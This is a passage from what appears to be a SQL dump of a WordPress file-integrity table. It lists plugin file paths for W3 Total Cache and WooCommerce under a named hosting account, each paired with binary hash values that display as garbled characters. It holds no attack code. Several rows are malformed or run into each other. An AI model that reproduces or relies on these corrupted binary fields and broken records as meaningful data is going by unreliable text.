NG\rD/W\r.xt','',0,'?'),('%[^:!;T','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/README.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fhũ`tBG+','ZTlfN@I;!ELt','',0,'?'),('|5(uBD','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/DisallowedRanges.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/DisallowedRanges.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǜ}ª?(Ln',';XYxTyTq^B[0? /Ɏ','',0,'?'),('~\'0 ;`','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/Regex.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/Regex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`\Z$BQԡ;~C','b蘿Voqu]\n2{44ˮ1~c','',0,'?'),('8:|x=,MX','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/deviation.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/deviation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/}D\rm(`',']Mq\'Z5v~Y}(V','',0,'?'),('_f8軮a1q','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/disallowed.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/disallowed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O^t⽉\niTb','>nj&f{a{?GgO','',0,'?'),('-Wjuˣ-','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/disallowed_STD3_mapped.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/disallowed_STD3_mapped.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';z3\0','aH)ݞ6.4sϤЗjI','',0,'?'),('a\'w\0R꿷','sիWUVil\\\'#bU','',0,'?'),('g Xy ̕','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/ignored.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/ignored.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qʓӧ c','+\0]bsPs_','',0,'?'),('I55ye z','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/mapped.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/mapped.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','39hn W','kzy:,L=mݡdNm<^!$','',0,'?'),('UL/Z޵F','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/virama.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/Resources/unidata/virama.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jS^M\"','[W߭jb mPw(.Ym','',0,'?'),('}H6yvR֯','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/bootstrap.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ug>2~$<-','lfmH\0L*ƔZ` ΫMfa@Aw','',0,'?'),('ac]Sqtq6q','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/composer.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-idn/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߽̂MGK ','`# Q&}^ A#jS','',0,'?'),('ԢYv','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/LICENSE','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^s~dž\n-`','2AprA$ {s_p>f','',0,'?'),('J H߃D','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Normalizer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Normalizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q:P\'Q(̷9','EUp@GiLwξ]]58 U!','',0,'?'),('Xb#·','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/README.md','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',uΏ4<\"M)8','/ˤ6´\r邶>ZN̹;}','',0,'?'),('UKxsBY5@c','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/stubs/Normalizer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/stubs/Normalizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѕ8DJ-\\6*SP','s:/@7`5եK1DSV ','',0,'?'),('ڽw::7p֒','',0,'?'),(';x6;Gp]IX','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/unidata/compatibilityDecomposition.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/Resources/unidata/compatibilityDecomposition.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U)2ڤ9ߗjVr','2kTMr;eWNhN /','',0,'?'),('ZIr;#|','wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/bootstrap.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/symfony/polyfill-intl-normalizer/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+&HpjoM4$','ڍz\\\0|~ߒ`$E \"L؀','',0,'?'),('(4L*՚DnY\r','',0,'?'),('C)j9_n','wp-content/plugins/woocommerce/assets/client/admin/64dabbb10478d0e2b133.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/64dabbb10478d0e2b133.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',V~r\rOD','wp-content/plugins/woocommerce/assets/client/admin/93973815f7cd64d5f512.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/93973815f7cd64d5f512.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']FR^ f+','(d.ƗLiD~U%ؠ\n)\"F','',0,'?'),('\'}0+kwj','wp-content/plugins/woocommerce/assets/client/admin/activity-panels-help/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/activity-panels-help/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B|HRn?Uj','\rT$k,B\0Q-fPb!','',0,'?'),('gAƜ%','wp-content/plugins/woocommerce/assets/client/admin/activity-panels-inbox/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/activity-panels-inbox/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eM b[WN\0Xs','>\",-xWab81b&{(','',0,'?'),('KDOb iAO','wp-content/plugins/woocommerce/assets/client/admin/admin-layout/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/admin-layout/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R~QH~7oo','EA \nJ .Pg-W\ZT{','',0,'?'),('ϫ\r8:Q;\'','wp-content/plugins/woocommerce/assets/client/admin/admin-layout/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/admin-layout/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bȖ|]r','ɶ8\0>٧U(B~G 0L5\n vt','',0,'?'),('X~GR4ƠuFY','wp-content/plugins/woocommerce/assets/client/admin/admin-layout/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/admin-layout/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+AG`; }0˕Xb8','',0,'?'),('Q<-\nᭊ-}','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-customers/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-customers/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=n  !*Y\'','= L> }0˕Xb8','',0,'?'),('ͫTcu9詬ٝ','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-downloads/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-downloads/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=n  !*Y\'','= L> }0˕Xb8','',0,'?'),('f͓d1\'Qz','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-orders/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-orders/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\".nʈ!= }0˕Xb8','',0,'?'),('X czR','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-taxes/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-taxes/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=n  !*Y\'','= L> }0˕Xb8','',0,'?'),('u4Ţ#yQ','wp-content/plugins/woocommerce/assets/client/admin/analytics-report-variations/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-report-variations/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=n  !*Y\'','= L> }0˕Xb8','',0,'?'),(':V׬=i','wp-content/plugins/woocommerce/assets/client/admin/analytics-settings/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/analytics-settings/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nӣ)bd 2C','5[3\nLO{ OWŝu(M\\5Neq','',0,'?'),('Pɜ96UZ69','wp-content/plugins/woocommerce/assets/client/admin/app/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/app/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','В\nDw','Cvؔ=9c`i iT_o.Ti','',0,'?'),('.!KL2S\0ehO','wp-content/plugins/woocommerce/assets/client/admin/app/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/app/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9(LƦ/\Z:xF','oh®-mW4ΥQ[&aN','',0,'?'),(':аO{9','wp-content/plugins/woocommerce/assets/client/admin/app/index.js.LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/app/index.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S v3@O','m!7InMYCnCt\0','',0,'?'),('4NCgfbNƃ','wp-content/plugins/woocommerce/assets/client/admin/app/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/app/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1Pcr+0~','IGڼJڠ\'| v\\','',0,'?'),('@vp͂T','wp-content/plugins/woocommerce/assets/client/admin/app/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/app/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{#}\nc','\Zst_|]ew`t','',0,'?'),('$RڶYZ/kK۰n!c%5','',0,'?'),('H%:o!|j\n9','wp-content/plugins/woocommerce/assets/client/admin/chunks/1061.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/1061.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iZRPہ','$]Y`5=|84 G2M5K\'','',0,'?'),('qIeC ','wp-content/plugins/woocommerce/assets/client/admin/chunks/1828.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/1828.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w]ƿQ','|Mm\r]De4Qt(elWdN','',0,'?'),('\"޽ [F','wp-content/plugins/woocommerce/assets/client/admin/chunks/185.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/185.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A,6,u7u','d4\"q|-+{h5֍','',0,'?'),('+`Ļ$\rXC\r','wp-content/plugins/woocommerce/assets/client/admin/chunks/2397.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/2397.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R1ln7[1',' $ݩr$e}jfZvT5ϖ ȱ','',0,'?'),('^i[*u4k','wp-content/plugins/woocommerce/assets/client/admin/chunks/2502.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/2502.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cx]*5O','TjL32Љ9Puco','',0,'?'),('\n1bwA','wp-content/plugins/woocommerce/assets/client/admin/chunks/2624.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/2624.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h:Ƨo','W U0$G#xj:ZvDMSrӡo','',0,'?'),('BE8Ac+m','wp-content/plugins/woocommerce/assets/client/admin/chunks/2953.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/2953.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n8~[t','Y8T.v@XӾ %kM fv\\','',0,'?'),('.?\"ڦ, X&?-','wp-content/plugins/woocommerce/assets/client/admin/chunks/3307.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/3307.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֋YMGCDy.2d1','Dĕws$\r:5-','',0,'?'),('1wF\0U','wp-content/plugins/woocommerce/assets/client/admin/chunks/3576.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/3576.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߰68','aX\rz \Z/IL+%^w','',0,'?'),('Ы/r94','wp-content/plugins/woocommerce/assets/client/admin/chunks/3700.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/3700.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cx]*5O','TjL32Љ9Puco','',0,'?'),('uh~*\\J a','wp-content/plugins/woocommerce/assets/client/admin/chunks/3727.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/3727.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j\ZȄ^o\'E$7%','g(~6FF.ѕhXgi','',0,'?'),('۵v\",ٗ1','wp-content/plugins/woocommerce/assets/client/admin/chunks/5792.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/5792.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5][Ⱥ!yзw@ ',']\rr>.T]I8{RkT,z[É UM]','',0,'?'),('kNt1VMd','wp-content/plugins/woocommerce/assets/client/admin/chunks/5792.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/5792.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!\0듮vBJ','67죓3Xɓw_D\n|>)U%','',0,'?'),('D_,w7m','wp-content/plugins/woocommerce/assets/client/admin/chunks/5838.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/5838.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޯ&F\n','ITl5B͉^;Ќ`\0ds$+','',0,'?'),('/B}ŷZ;F','wp-content/plugins/woocommerce/assets/client/admin/chunks/6125.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/6125.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s|\'M_','u#j \"Jc~Vm`?ۯ','',0,'?'),('yдQBTF\Z','wp-content/plugins/woocommerce/assets/client/admin/chunks/6412.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/6412.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r9M͏mLU[Ra','߅\"\Za\0\\-Ek+ީK]n.','',0,'?'),('֗_fЬTg@','wp-content/plugins/woocommerce/assets/client/admin/chunks/6412.js.LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/6412.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oSq>aq,’F','eV܅y@y^tf 0H{5e','',0,'?'),('hd@B} fG','wp-content/plugins/woocommerce/assets/client/admin/chunks/6732.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/6732.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F!Leƶb','fIYxD5M*Ǐ7ESR Z2','',0,'?'),('lFqߑ^p4','wp-content/plugins/woocommerce/assets/client/admin/chunks/6824.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/6824.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A,6,u7u','d4\"q|-+{h5֍','',0,'?'),('kb:\"笜4v3','wp-content/plugins/woocommerce/assets/client/admin/chunks/727.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/727.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%+eѦaF','8r:aK\\m!K ֖#u^g','',0,'?'),('^L o','wp-content/plugins/woocommerce/assets/client/admin/chunks/7387.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/7387.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']+.;OKE?','Q3Ձas_oI;g%6S0%m','',0,'?'),('\"&PBbQᒗ','wp-content/plugins/woocommerce/assets/client/admin/chunks/7708.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/7708.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6_IʥDgq#9lB8t','wp-content/plugins/woocommerce/assets/client/admin/chunks/8597.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/8597.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dciXC-','mBl$]+*;wJxfj×','',0,'?'),('`h@(\n','wp-content/plugins/woocommerce/assets/client/admin/chunks/8758.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/8758.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rrq\Z?6K|',' J9n35aUJ|T','',0,'?'),('zgn5','wp-content/plugins/woocommerce/assets/client/admin/chunks/8851.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/8851.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cqf r','oŮ\Z+CPA','',0,'?'),('B\rA~U$p݆\nT','wp-content/plugins/woocommerce/assets/client/admin/chunks/8994.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/8994.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iR]at.v','M\nPu\'f/{Dڟc','',0,'?'),('͕O@dV','wp-content/plugins/woocommerce/assets/client/admin/chunks/925.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/925.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kKtQU\ZH','u KhP#S~s\\/CB>H|h','',0,'?'),(' !D`vP@oU','wp-content/plugins/woocommerce/assets/client/admin/chunks/9360.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9360.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h#5','ٳCk7pe&ό=','',0,'?'),('*i2|Q&\ZfW\'','wp-content/plugins/woocommerce/assets/client/admin/chunks/9456.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9456.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cx]*5O','TjL32Љ9Puco','',0,'?'),('JPLw^AD','wp-content/plugins/woocommerce/assets/client/admin/chunks/9529.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9529.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z]OiQqw','0 L@8L\Z$)>[s','',0,'?'),('xT@A&','wp-content/plugins/woocommerce/assets/client/admin/chunks/9616.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9616.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}*|-eEz','\'un)aNPIk[;CϢ','',0,'?'),('\nNx`#߷ߘ','wp-content/plugins/woocommerce/assets/client/admin/chunks/9669.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9669.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xgx>{Yc','k,aͥeZ4x x@b','',0,'?'),('RW̘qJ݅U','wp-content/plugins/woocommerce/assets/client/admin/chunks/9792.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9792.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cx]*5O','TjL32Љ9Puco','',0,'?'),('\Z!o[5]','wp-content/plugins/woocommerce/assets/client/admin/chunks/9966.style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/9966.style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' :uZ0','Hu/`ФIz\'\"0:[klL\'u','',0,'?'),('C!ˊJ\Z{~!t','wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-help.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-help.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p`=yU+jG;','yehd}:itwOGUsRκ!Wwxr','',0,'?'),('i\\K)XZO','wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-inbox.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-inbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W(\r54py','4[zunxa/\Z -)8','',0,'?'),('\'q\0SmsQ','wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-setup.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/activity-panels-setup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x`Q_= ','Xa^W#2Sŝmt','',0,'?'),('͋u<]zg>','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-categories.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-categories.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'1Vj0e&o&','\n>Kvxɞb7d','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-products.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-products.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Eg0v3 ?','M6W(0;a}xRח','',0,'?'),('>%cq\rF','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-revenue.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-revenue.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ef9es$X',']s~\06-ygߗS3Blt','',0,'?'),('#m{','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-stock.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-stock.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=g-v(','eI(\";1늕7L$&y\"','',0,'?'),('@X\0\n`ږ\r','wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-taxes.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/analytics-report-taxes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VH,3nG','o}Wk3 ;W>]vx','wp-content/plugins/woocommerce/assets/client/admin/chunks/customizable-dashboard.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/customizable-dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3{ 8S','8\Z94u _ ]{@evu','',0,'?'),('G`U&','wp-content/plugins/woocommerce/assets/client/admin/chunks/customize-store.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/customize-store.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','79TzrZ5',';Jէ1$ `\\M워&qEMq\"','',0,'?'),('\Z\Zc(T;JFc','wp-content/plugins/woocommerce/assets/client/admin/chunks/dashboard-charts.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/dashboard-charts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w{_`ټ@T','3O$߭@ל(0','',0,'?'),('vh7eg@`m','wp-content/plugins/woocommerce/assets/client/admin/chunks/dashboard.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U','W03.ÑWmɏ0-⯿','',0,'?'),('j\Z]yDQ*{>','wp-content/plugins/woocommerce/assets/client/admin/chunks/edit-product-page.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/edit-product-page.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 |N̈','+vgY\'aQ>\r}rM_}\"M','',0,'?'),('C`h9~[(Zv','wp-content/plugins/woocommerce/assets/client/admin/chunks/homescreen.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/homescreen.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'f6h','j硫MAqC֬?՝&2™','',0,'?'),('n b[l0nX@','wp-content/plugins/woocommerce/assets/client/admin/chunks/leaderboards.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/leaderboards.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F=aƣ%','8pp\nZj/Sw3Q 